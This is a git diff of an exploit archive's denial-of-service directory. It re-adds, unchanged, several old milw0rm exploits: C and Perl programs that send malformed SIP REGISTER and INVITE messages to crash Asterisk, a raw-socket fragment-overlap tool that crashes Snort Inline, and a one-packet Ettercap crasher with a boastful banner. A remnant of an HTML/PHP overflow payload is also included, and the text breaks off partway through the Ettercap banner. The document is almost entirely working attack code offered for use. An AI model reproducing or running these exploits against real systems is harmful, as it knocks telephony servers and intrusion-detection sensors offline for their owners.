+ + + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC + + + + "); +?> + +# milw0rm.com [2007-03-04] diff --git a/platforms/multiple/dos/3407.c b/platforms/multiple/dos/3407.c index dc7a23084..669abd2bf 100755 --- a/platforms/multiple/dos/3407.c +++ b/platforms/multiple/dos/3407.c @@ -1,126 +1,126 @@ -/* -this will cause asterisk to segfault, -the bug that this exploits has been patched in release 1.2.16 & 1.4.1 - -CLI> - -Program received signal SIGSEGV, Segmentation fault. -[Switching to Thread 1082719152 (LWP 2510)] -register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0) - at chan_sip.c:8257 -8257 while (*t && *t > ' ' && *t != ';') -(gdb) - - -build: -gcc -o asterisk-sip-killer asterisk-sip-killer.c - -run: -./asterisk-sip-killer -h - -*/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SIP_UDP_PORT 5060 - -struct udp_session { - int sd; - struct sockaddr_in saddr; -}; - -int make_udp(struct udp_session *p, char *remotehost, int port) -{ - int sd; - int ret; - struct sockaddr_in saddr; - struct hostent *he; - - sd = socket(AF_INET,SOCK_DGRAM,0); - - if (sd == -1) { - printf("error making socket\n"); - return -1; - } - - he = gethostbyname(remotehost); - - saddr.sin_family = AF_INET; - saddr.sin_port = htons(port); - saddr.sin_addr.s_addr = inet_addr(remotehost); - memset(&(saddr.sin_zero), '\0', 8); - p->sd = sd; - memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in)); - - printf("udp socket ready\n"); - - return 0; -} - -void kill_asterisk(struct udp_session *sess) -{ - int ret; - char *p = - "REGISTER \r\n" - "Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n" - "Max-Forwards: 70\r\n" - "From: ;tag=as253946cf\r\n" - "To: \r\n" - "Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n" - "CSeq: 104 REGISTER\r\n" - "User-Agent: Asterisk PBX\r\n" - "Expires: 120\r\n" - "Contact: \r\n" - "Event: registration\r\n" - "Content-Length: 0\r\n"; - - ret = sendto(sess->sd, p, strlen(p), 0, - (struct sockaddr *)&sess->saddr, - sizeof(struct sockaddr)); - - if (ret) { - printf("You may have well shutdown a asterisk server\n"); - } else { - printf("there was a issue sending the request\n"); - return; - } - return; -} -int main(int argc, char **argv) -{ - int i = 0; - char *r_host = NULL; - struct udp_session *connection_out; - - - for (i=0;i option!\n"); - return 0; - } - - if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) { - printf("malloc failed your computer sucks\n"); - return 0; - } - make_udp(connection_out, r_host, SIP_UDP_PORT); - kill_asterisk(connection_out); - free(connection_out); - return 0; -} - -// milw0rm.com [2007-03-04] +/* +this will cause asterisk to segfault, +the bug that this exploits has been patched in release 1.2.16 & 1.4.1 + +CLI> + +Program received signal SIGSEGV, Segmentation fault. +[Switching to Thread 1082719152 (LWP 2510)] +register_verify (p=0x81cf600, sin=0x4088e750, req=0x4088e760, uri=0x0) + at chan_sip.c:8257 +8257 while (*t && *t > ' ' && *t != ';') +(gdb) + + +build: +gcc -o asterisk-sip-killer asterisk-sip-killer.c + +run: +./asterisk-sip-killer -h + +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SIP_UDP_PORT 5060 + +struct udp_session { + int sd; + struct sockaddr_in saddr; +}; + +int make_udp(struct udp_session *p, char *remotehost, int port) +{ + int sd; + int ret; + struct sockaddr_in saddr; + struct hostent *he; + + sd = socket(AF_INET,SOCK_DGRAM,0); + + if (sd == -1) { + printf("error making socket\n"); + return -1; + } + + he = gethostbyname(remotehost); + + saddr.sin_family = AF_INET; + saddr.sin_port = htons(port); + saddr.sin_addr.s_addr = inet_addr(remotehost); + memset(&(saddr.sin_zero), '\0', 8); + p->sd = sd; + memcpy(&p->saddr,&saddr,sizeof(struct sockaddr_in)); + + printf("udp socket ready\n"); + + return 0; +} + +void kill_asterisk(struct udp_session *sess) +{ + int ret; + char *p = + "REGISTER \r\n" + "Via: SIP/2.0/UDP 192.168.204.130:5060;branch=z9hG4bK1d97e14f\r\n" + "Max-Forwards: 70\r\n" + "From: ;tag=as253946cf\r\n" + "To: \r\n" + "Call-ID: 7e64a49e5cf018231228938050e43d3b@127.0.0.1\r\n" + "CSeq: 104 REGISTER\r\n" + "User-Agent: Asterisk PBX\r\n" + "Expires: 120\r\n" + "Contact: \r\n" + "Event: registration\r\n" + "Content-Length: 0\r\n"; + + ret = sendto(sess->sd, p, strlen(p), 0, + (struct sockaddr *)&sess->saddr, + sizeof(struct sockaddr)); + + if (ret) { + printf("You may have well shutdown a asterisk server\n"); + } else { + printf("there was a issue sending the request\n"); + return; + } + return; +} +int main(int argc, char **argv) +{ + int i = 0; + char *r_host = NULL; + struct udp_session *connection_out; + + + for (i=0;i option!\n"); + return 0; + } + + if (!(connection_out = (struct udp_session *)malloc(sizeof(struct udp_session)))) { + printf("malloc failed your computer sucks\n"); + return 0; + } + make_udp(connection_out, r_host, SIP_UDP_PORT); + kill_asterisk(connection_out); + free(connection_out); + return 0; +} + +// milw0rm.com [2007-03-04] diff --git a/platforms/multiple/dos/3434.c b/platforms/multiple/dos/3434.c index 6e8f3f0de..490a4d8bf 100755 --- a/platforms/multiple/dos/3434.c +++ b/platforms/multiple/dos/3434.c @@ -1,292 +1,292 @@ -/********************************************************* - * DOS Snort Inline - * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) - * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled - * Antimatt3r - * antimatter@gmail.com - * Offset needs to be supplied that would cause reassembly for different snort - * fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset - * will trigger the segfault. - ********************************************************/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -#define NOOP_FRAG_SLED 576 -#define NOOP_SHORT 16 - - -struct addr { - uint32_t ip; - char mac[ETH_ALEN]; -}; - -struct dev { - uint32_t index; - char name[IFNAMSIZ]; -}; - -int mac_aton(char *, char *); -void usage(char *cmd) { - fprintf(stderr, "usage: %s \n", cmd); -} - -int mac_aton(char *amac, char *nmac) { - char c; - int i; - unsigned int val; - - i = 0; - while ((*amac != '\0') && (i < ETH_ALEN)) { - val = 0; - c = *amac++; - if (c >= '0' && c <= '9') { - val = c - '0'; - } - else if (c >= 'a' && c <= 'f') { - val = c - 'a' + 10; - } - else if (c >= 'A' && c <= 'F') { - val = c - 'A' + 10; - } - else { - errno = EINVAL; - return -1; - } - val <<= 4; - - c = *amac; - if (c >= '0' && c <= '9') { - val |= c - '0'; - } - else if (c >= 'a' && c <= 'f') { - val |= c - 'a' + 10; - } - else if (c >= 'A' && c <= 'F') { - val |= c - 'A' + 10; - } - else if (c == ':' || c == '\0') { - val >>= 4; - } - else { - errno = EINVAL; - return -1; - } - if (c != 0) { - amac++; - } - *nmac++ = val & 0xff; - i++; - - /* We might get a semicolon here - not required. */ - if (*amac == ':') { - amac++; - } - } - return 0; -} - - -int in_cksum(u_short *addr, int len) { -int nleft = len; -u_short *w = addr; -int sum = 0; -u_short answer = 0; - - while (nleft > 1) { - sum += *w++; - nleft -= 2; - } - - if (nleft == 1) { - *(u_char *)(&answer) = *(u_char *)w; - sum += answer; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; - - return answer; -} - -int send_morefrag_packet(int sock, struct dev *dev, struct addr *src, struct -addr *dst) { - struct sockaddr_ll sll; - struct ether_header *eth; - struct iphdr *ip; - struct udphdr *udp; - u_char *payload; - char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_FRAG_SLED]; - - memset(&sll, 0, sizeof(sll)); - sll.sll_family = PF_PACKET; - sll.sll_ifindex = dev->index; - sll.sll_halen = ETH_ALEN; - memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); - - memset(buf, 0, sizeof(buf)); - eth = (struct ether_header *)buf; - ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); - udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); - payload = (u_char *)((char *)udp + sizeof(struct udphdr)); - - memset(payload,'\x90',NOOP_FRAG_SLED); - - - udp->source = htons(1111); - udp->dest = htons(1111); - udp->len = htons(sizeof(struct udphdr) + NOOP_FRAG_SLED) ; - udp->check =0; - - - ip->version = 4; - ip->ihl = 5; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_FRAG_SLED); - ip->id = 31337; - ip->ttl = 64; - ip->frag_off = htons(0x2000); - ip->protocol = IPPROTO_UDP; - ip->saddr = src->ip; - ip->daddr = dst->ip; - ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); - - memcpy(eth->ether_shost, src->mac, ETH_ALEN); - memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); - eth->ether_type = htons(ETH_P_IP); - - if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) - printf ("error %d %s\n",errno,strerror(errno)); - else - printf("MF Packet Sent\n"); -} - -int send_overlap_packet(int sock, struct dev *dev, struct addr *src, struct -addr *dst,int offset) { - struct sockaddr_ll sll; - struct ether_header *eth; - struct iphdr *ip; - struct udphdr *udp; - u_char *payload; - char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_SHORT ]; - - memset(&sll, 0, sizeof(sll)); - sll.sll_family = PF_PACKET; - sll.sll_ifindex = dev->index; - sll.sll_halen = ETH_ALEN; - memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); - - memset(buf, 0, sizeof(buf)); - eth = (struct ether_header *)buf; - ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); - udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); - payload = (u_char *)((char *)udp + sizeof(struct udphdr)); - - memset(payload,'\x90',NOOP_SHORT); - - udp->source = htons(1111); - udp->dest = htons(1111); - udp->len = htons(sizeof(struct udphdr) + NOOP_SHORT) ; - udp->check =0; - - ip->version = 4; - ip->ihl = 5; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_SHORT); - ip->id = 31337; - ip->frag_off = ntohs(offset); - ip->ttl = 64; - ip->protocol = IPPROTO_UDP; - ip->saddr = src->ip; - ip->daddr = dst->ip; - ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); - - memcpy(eth->ether_shost, src->mac, ETH_ALEN); - memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); - eth->ether_type = htons(ETH_P_IP); - - if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) - printf ("error %d %s\n",errno,strerror(errno)); - else - printf("2nd Packet Sent\n"); -} - - -int main(int argc, char *argv[]) { - int sock = 0; - struct dev dev; - struct addr src, dst; - int offset; //play with varying offsets - - if (argc < 7) { - usage(argv[0]); - return -1; - } - - memset(&dev, 0, sizeof(dev)); - strncpy(dev.name, argv[1], IFNAMSIZ-1); - if((dev.index = if_nametoindex(dev.name)) == 0) { - perror(argv[1]); - exit(-1); - } - - memset(&src, 0, sizeof(src)); - if (inet_aton(argv[2], (struct in_addr *)&src.ip) == 0) { - fprintf(stderr, "%s: invalid src ip address\n", argv[2]); - exit(-1); - } - - if (mac_aton(argv[3], src.mac) < 0) { - fprintf(stderr, "%s: invalid src hardware address\r\n", argv[3]); - exit(-1); - } - - memset(&dst, 0, sizeof(dst)); - if (inet_aton(argv[4], (struct in_addr *)&dst.ip) == 0) { - fprintf(stderr, "%s: invalid ip address\r\n", argv[2]); - exit(-1); - } - - if (mac_aton(argv[5], dst.mac) < 0) { - fprintf(stderr, "%s: invalid hardware address\r\n", argv[3]); - exit(-1); - } - - offset = atoi(argv[6]); - - if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { - perror("socket"); - exit(-1); - } - - if (send_morefrag_packet(sock, &dev, &src, &dst) < 0) { - perror("send error "); - exit(-1); - } - - if (send_overlap_packet(sock, &dev, &src, &dst,offset) < 0) { - perror("send error"); - exit(-1); - } - - close(sock); - - return 0; -} - -// milw0rm.com [2007-03-08] +/********************************************************* + * DOS Snort Inline + * Affected Versions: 2.6.1.1, 2.6.1.2, 2.7.0(beta) + * Requirements : Frag3 Enabled, Inline, Linux, ip_conntrack disabled + * Antimatt3r + * antimatter@gmail.com + * Offset needs to be supplied that would cause reassembly for different snort + * fragmentation reassembly policies. Since the first packet is hardcoded 70-74 offset + * will trigger the segfault. + ********************************************************/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define NOOP_FRAG_SLED 576 +#define NOOP_SHORT 16 + + +struct addr { + uint32_t ip; + char mac[ETH_ALEN]; +}; + +struct dev { + uint32_t index; + char name[IFNAMSIZ]; +}; + +int mac_aton(char *, char *); +void usage(char *cmd) { + fprintf(stderr, "usage: %s \n", cmd); +} + +int mac_aton(char *amac, char *nmac) { + char c; + int i; + unsigned int val; + + i = 0; + while ((*amac != '\0') && (i < ETH_ALEN)) { + val = 0; + c = *amac++; + if (c >= '0' && c <= '9') { + val = c - '0'; + } + else if (c >= 'a' && c <= 'f') { + val = c - 'a' + 10; + } + else if (c >= 'A' && c <= 'F') { + val = c - 'A' + 10; + } + else { + errno = EINVAL; + return -1; + } + val <<= 4; + + c = *amac; + if (c >= '0' && c <= '9') { + val |= c - '0'; + } + else if (c >= 'a' && c <= 'f') { + val |= c - 'a' + 10; + } + else if (c >= 'A' && c <= 'F') { + val |= c - 'A' + 10; + } + else if (c == ':' || c == '\0') { + val >>= 4; + } + else { + errno = EINVAL; + return -1; + } + if (c != 0) { + amac++; + } + *nmac++ = val & 0xff; + i++; + + /* We might get a semicolon here - not required. */ + if (*amac == ':') { + amac++; + } + } + return 0; +} + + +int in_cksum(u_short *addr, int len) { +int nleft = len; +u_short *w = addr; +int sum = 0; +u_short answer = 0; + + while (nleft > 1) { + sum += *w++; + nleft -= 2; + } + + if (nleft == 1) { + *(u_char *)(&answer) = *(u_char *)w; + sum += answer; + } + + sum = (sum >> 16) + (sum & 0xffff); + sum += (sum >> 16); + answer = ~sum; + + return answer; +} + +int send_morefrag_packet(int sock, struct dev *dev, struct addr *src, struct +addr *dst) { + struct sockaddr_ll sll; + struct ether_header *eth; + struct iphdr *ip; + struct udphdr *udp; + u_char *payload; + char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_FRAG_SLED]; + + memset(&sll, 0, sizeof(sll)); + sll.sll_family = PF_PACKET; + sll.sll_ifindex = dev->index; + sll.sll_halen = ETH_ALEN; + memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); + + memset(buf, 0, sizeof(buf)); + eth = (struct ether_header *)buf; + ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); + udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); + payload = (u_char *)((char *)udp + sizeof(struct udphdr)); + + memset(payload,'\x90',NOOP_FRAG_SLED); + + + udp->source = htons(1111); + udp->dest = htons(1111); + udp->len = htons(sizeof(struct udphdr) + NOOP_FRAG_SLED) ; + udp->check =0; + + + ip->version = 4; + ip->ihl = 5; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_FRAG_SLED); + ip->id = 31337; + ip->ttl = 64; + ip->frag_off = htons(0x2000); + ip->protocol = IPPROTO_UDP; + ip->saddr = src->ip; + ip->daddr = dst->ip; + ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); + + memcpy(eth->ether_shost, src->mac, ETH_ALEN); + memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); + eth->ether_type = htons(ETH_P_IP); + + if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) + printf ("error %d %s\n",errno,strerror(errno)); + else + printf("MF Packet Sent\n"); +} + +int send_overlap_packet(int sock, struct dev *dev, struct addr *src, struct +addr *dst,int offset) { + struct sockaddr_ll sll; + struct ether_header *eth; + struct iphdr *ip; + struct udphdr *udp; + u_char *payload; + char buf[sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct udphdr)+ NOOP_SHORT ]; + + memset(&sll, 0, sizeof(sll)); + sll.sll_family = PF_PACKET; + sll.sll_ifindex = dev->index; + sll.sll_halen = ETH_ALEN; + memcpy(&sll.sll_addr, dst->mac, ETH_ALEN); + + memset(buf, 0, sizeof(buf)); + eth = (struct ether_header *)buf; + ip = (struct iphdr *)((char *)eth + sizeof(struct ether_header)); + udp = (struct udphdr *)((char *)ip + sizeof(struct iphdr)); + payload = (u_char *)((char *)udp + sizeof(struct udphdr)); + + memset(payload,'\x90',NOOP_SHORT); + + udp->source = htons(1111); + udp->dest = htons(1111); + udp->len = htons(sizeof(struct udphdr) + NOOP_SHORT) ; + udp->check =0; + + ip->version = 4; + ip->ihl = 5; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + NOOP_SHORT); + ip->id = 31337; + ip->frag_off = ntohs(offset); + ip->ttl = 64; + ip->protocol = IPPROTO_UDP; + ip->saddr = src->ip; + ip->daddr = dst->ip; + ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr)); + + memcpy(eth->ether_shost, src->mac, ETH_ALEN); + memcpy(eth->ether_dhost, dst->mac, ETH_ALEN); + eth->ether_type = htons(ETH_P_IP); + + if(sendto(sock, buf, sizeof(buf), 0, (struct sockaddr *)&sll, sizeof(sll)) == -1) + printf ("error %d %s\n",errno,strerror(errno)); + else + printf("2nd Packet Sent\n"); +} + + +int main(int argc, char *argv[]) { + int sock = 0; + struct dev dev; + struct addr src, dst; + int offset; //play with varying offsets + + if (argc < 7) { + usage(argv[0]); + return -1; + } + + memset(&dev, 0, sizeof(dev)); + strncpy(dev.name, argv[1], IFNAMSIZ-1); + if((dev.index = if_nametoindex(dev.name)) == 0) { + perror(argv[1]); + exit(-1); + } + + memset(&src, 0, sizeof(src)); + if (inet_aton(argv[2], (struct in_addr *)&src.ip) == 0) { + fprintf(stderr, "%s: invalid src ip address\n", argv[2]); + exit(-1); + } + + if (mac_aton(argv[3], src.mac) < 0) { + fprintf(stderr, "%s: invalid src hardware address\r\n", argv[3]); + exit(-1); + } + + memset(&dst, 0, sizeof(dst)); + if (inet_aton(argv[4], (struct in_addr *)&dst.ip) == 0) { + fprintf(stderr, "%s: invalid ip address\r\n", argv[2]); + exit(-1); + } + + if (mac_aton(argv[5], dst.mac) < 0) { + fprintf(stderr, "%s: invalid hardware address\r\n", argv[3]); + exit(-1); + } + + offset = atoi(argv[6]); + + if ((sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0) { + perror("socket"); + exit(-1); + } + + if (send_morefrag_packet(sock, &dev, &src, &dst) < 0) { + perror("send error "); + exit(-1); + } + + if (send_overlap_packet(sock, &dev, &src, &dst,offset) < 0) { + perror("send error"); + exit(-1); + } + + close(sock); + + return 0; +} + +// milw0rm.com [2007-03-08] diff --git a/platforms/multiple/dos/3566.pl b/platforms/multiple/dos/3566.pl index a3fd88010..bb9847f02 100755 --- a/platforms/multiple/dos/3566.pl +++ b/platforms/multiple/dos/3566.pl @@ -1,21 +1,21 @@ -#!/usr/bin/perl -# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[5]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - -$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-03-25] +#!/usr/bin/perl +# perl asterisk-Invite.pl 192.168.1.104 5060 userX 192.168.1.2 5060 userY + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[5]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + +$msg="INVITE sip:$ARGV[2]\@$ARGV[0]:$ARGV[1] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3]:$ARGV[4];branch=01;rport\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nContent-Type: application/sdp\r\nCSeq: 01 INVITE\r\nContent-Length: 187\r\n\r\nv=0\r\no=root 25903 25903 IN IP4 $ARGV[3]\r\ns=session\r\nc=IN IP4 $ARGV[3]\r\nc=IN IP4 910.188.8.2\r\nt=0 0\r\nm=audio 13956 RTP/AVP 0 4 3 8 111 5 10 7 18 110 97 101\r\na=rtpmap:98 speex/16000\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-03-25] diff --git a/platforms/multiple/dos/3709.html b/platforms/multiple/dos/3709.html index 9df63064c..07cdb6a4c 100755 --- a/platforms/multiple/dos/3709.html +++ b/platforms/multiple/dos/3709.html @@ -1,19 +1,19 @@ - - - - - - - - - - - - -# milw0rm.com [2007-04-11] + + + + + + + + + + + + +# milw0rm.com [2007-04-11] diff --git a/platforms/multiple/dos/3726.c b/platforms/multiple/dos/3726.c index 7ba279b3d..c8e892ab9 100755 --- a/platforms/multiple/dos/3726.c +++ b/platforms/multiple/dos/3726.c @@ -1,190 +1,190 @@ -/* - WARNING WARNING WARNING - - THIS PACKAGE CONTAINS AN 0DAY. - NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR MOLESTS YOUR DOG. - - WARNING WARNING WARNING - - - THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE! - - If you want to know how this works then figure it out yourself. - Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1 - - greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated, xtaylor, and rest of global hell,riot, JxT, - p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for fucking french women and anyone else I forgot.. - - REMEBER KIDS EVILRABBI LOVES YOU :*. - - gcc -Wall -o b4b0-ettercap b4b0-ettercap.c - ./b4b0-ettercap - -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define IP struct iphdr -#define TCP struct tcphdr - -void usage(); -unsigned short ipChecksum(unsigned short *ptr, int nbytes); - -void usage() -{ -int i; -for (i=0; i < 100; i++) { printf("\n");} - - printf(" VVVVVVVVVVV VVVVVVVVVVV\n"); - printf(" VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV\n"); - printf(" VVVVVVVVVV VVVVVVV\n"); - printf(" VVVVVVVVV b4b0-ettercap.c VVVVVVV\n"); - printf(" . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a,\n"); - printf(" $$' VVVVVVVVVV,d$$$ $$' VVVVV .s$',8P\"' `\"Y8, . \n"); - printf(" yxxx.$$.xxxxxxxxxxxx ,d$\"`$$.x.$$.xxxxxxxx.,8P.xxxx.s`$$,.xxxg \n"); - printf(" $ P' $$,d$$Yba, ,d$\" d $$ $$,d$$Yba, 88 ,$.$$$ $ \n"); - printf(" $ ' $$P' ,`$$a ,d$\" ``\" $$ , $$$P' ,`Y$a 88 ,s$,$$$ . $ \n"); - printf(" $ $$k g Y$$ $$$$$$$$$$$$$ $$f d d$$ `8b ,$$'d$$' ,d $ \n"); - printf(" bxxx.$$$, '`,d$\".xxxxxxxx.$$.x.$$b, ',a$$\".x`8ba,,aad$$'.xxxxd. . \n"); - printf(" s$Y\"Y$bd$P',yas.VVVV s$$z $Y\"Y$$$P\"' \"Y$$$$(headflux)$ \n"); - printf(" VVVVVVVV VVVVVVVV \n"); - printf(" VVVVVVVV VVVVVVVV \n"); - printf(" ettercap-ng v0.7.3 VVVVVVVV VVVVVVVV \n"); - printf(" Denial of Service VVVVVVVVVVVVVVVV \n"); - printf(" by EvilRabbi VVVVVVVVVVVVVV \n"); - printf(" VVVVVV \n"); - printf(" VVVV \n"); - printf(" VV \n"); -} -unsigned short ipChecksum(unsigned short *ptr, int nbytes) -{ - register long sum; - register u_short answer; - u_short oddbyte; - - sum = 0; - - while (nbytes > 1) { - sum += *ptr++; - nbytes -= 2; - } - - if (nbytes == 1) { - oddbyte = 0; - *((u_char *) & oddbyte) = *(u_char *) ptr; - sum += oddbyte; - } - - sum = (sum >> 16) + (sum & 0xffff); - sum += (sum >> 16); - answer = ~sum; -return (answer); -} - -int main(int argc, char **argv) -{ - int sockfd, opt = 1; - char tcpoptions[4]; - char dest[20]; - unsigned int pLen,sIPLen; - unsigned char pkt[(pLen = sizeof(IP) + sizeof(TCP) + 4)]; - unsigned char ip[(sIPLen = 12 + sizeof(TCP) + 4)]; - struct hostent *he; - struct sockaddr_in host; - struct sockaddr_in s; - - struct in_addr etter; - IP *iphdr = (IP *)pkt; - TCP *tcphdr = (TCP *)((unsigned char *)pkt + sizeof(IP)); - - if (getuid() != 0) { - printf("you need to be r00t =(\n"); - exit(0); - } - - if (argc != 2) { - usage(); - exit(0); - } - if ((he=gethostbyname(argv[1])) == NULL) { // get the host info - herror("gethostbyname"); - exit(1); - } - snprintf (dest,sizeof(dest)-1,"%d.%d.%d.%d\n", (unsigned char)he->h_addr_list[0][0], - (unsigned char)he->h_addr_list[0][1], - (unsigned char)he->h_addr_list[0][2], - (unsigned char)he->h_addr_list[0][3]); - - if ((sockfd = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) == -1) { - perror("socket"); - exit(1); - } - setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&opt,sizeof(opt)); - - etter.s_addr = inet_addr(dest); - s.sin_addr.s_addr = INADDR_ANY; - //etter.s_addr = inet_addr("69.46.19.77"); - memset(tcpoptions,0,sizeof(tcpoptions)); - tcpoptions[0]=0x08; - tcpoptions[1]=0x00; - tcpoptions[2]=0x00; - tcpoptions[3]=0x00; - - memset(&host, 0, sizeof(host)); - memset(pkt, 0, pLen); - memcpy(pkt+sizeof(IP)+sizeof(TCP), tcpoptions, sizeof(tcpoptions)); - memset(ip, 0, sIPLen); - *((unsigned long *)((unsigned char *)ip+0)) = s.sin_addr.s_addr; - *((unsigned long *)((unsigned char *)ip+4)) = etter.s_addr; - *((unsigned char *)((unsigned char *)ip+8)) = 0; - *((unsigned char *)((unsigned char *)ip+9)) = IPPROTO_TCP; - *((unsigned short *)((unsigned char *)ip+10)) = htons(pLen - sizeof(IP)); - iphdr->version = 4; - iphdr->ihl = 5; - iphdr->id = rand() & 0xFFFF; - iphdr->id = iphdr->id + 1; - iphdr->saddr = s.sin_addr.s_addr; - iphdr->daddr = etter.s_addr; - iphdr->protocol = IPPROTO_TCP; - iphdr->ttl = 255; - iphdr->tot_len = pLen; - iphdr->check = ipChecksum((u_short *)iphdr, sizeof(IP)); - - host.sin_family = AF_INET; - host.sin_addr.s_addr = etter.s_addr; - - tcphdr->source = htons(8); - tcphdr->dest = htons(1); - tcphdr->seq = htonl(rand()); - tcphdr->ack_seq = htonl(rand()); - tcphdr->doff = ((sizeof(TCP)+4) / 4); - tcphdr->check=0; - tcphdr->fin = 0; - tcphdr->syn = 1; - tcphdr->rst = 0; - tcphdr->psh = 0; - tcphdr->ack = 0; - tcphdr->urg = 0; - tcphdr->window = htons(5840); - memcpy(ip+12, ((unsigned char *)pkt)+sizeof(IP), pLen - sizeof(IP)); - tcphdr->check = ipChecksum((u_short *)&ip, sIPLen); - - sendto(sockfd, pkt, pLen, 0, (struct sockaddr *)&host, sizeof(host)); - - return 0; -} - -// milw0rm.com [2007-04-13] +/* + WARNING WARNING WARNING + + THIS PACKAGE CONTAINS AN 0DAY. + NO ONE CAN BE HELD RESPONSIBLE IF THIS CODE RAPES YOUR SISTER OR MOLESTS YOUR DOG. + + WARNING WARNING WARNING + + + THE ONE PACKET ETTERCAP KILLER NOW IN A SMALLER PACKAGE! + + If you want to know how this works then figure it out yourself. + Tested with Ettercap-NG v 0.7.3 on FreeBSD 6.1 and Slackware 10.1 + + greetz go out to tip, milkmang, chrak, jcb, rest of b4b0, mosthated, xtaylor, and rest of global hell,riot, JxT, + p00kie_p0x, tadp0le, #oldskewl, #ubergeeks, #wp, le_kickban for fucking french women and anyone else I forgot.. + + REMEBER KIDS EVILRABBI LOVES YOU :*. + + gcc -Wall -o b4b0-ettercap b4b0-ettercap.c + ./b4b0-ettercap + +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define IP struct iphdr +#define TCP struct tcphdr + +void usage(); +unsigned short ipChecksum(unsigned short *ptr, int nbytes); + +void usage() +{ +int i; +for (i=0; i < 100; i++) { printf("\n");} + + printf(" VVVVVVVVVVV VVVVVVVVVVV\n"); + printf(" VVVVV[ T34M B4B0 PROUDLY PRESENTS: ]VVVV\n"); + printf(" VVVVVVVVVV VVVVVVV\n"); + printf(" VVVVVVVVV b4b0-ettercap.c VVVVVVV\n"); + printf(" . $&y VVVVVVVVVV ,p& y&$ VVVVVVVVVV,a8888a,\n"); + printf(" $$' 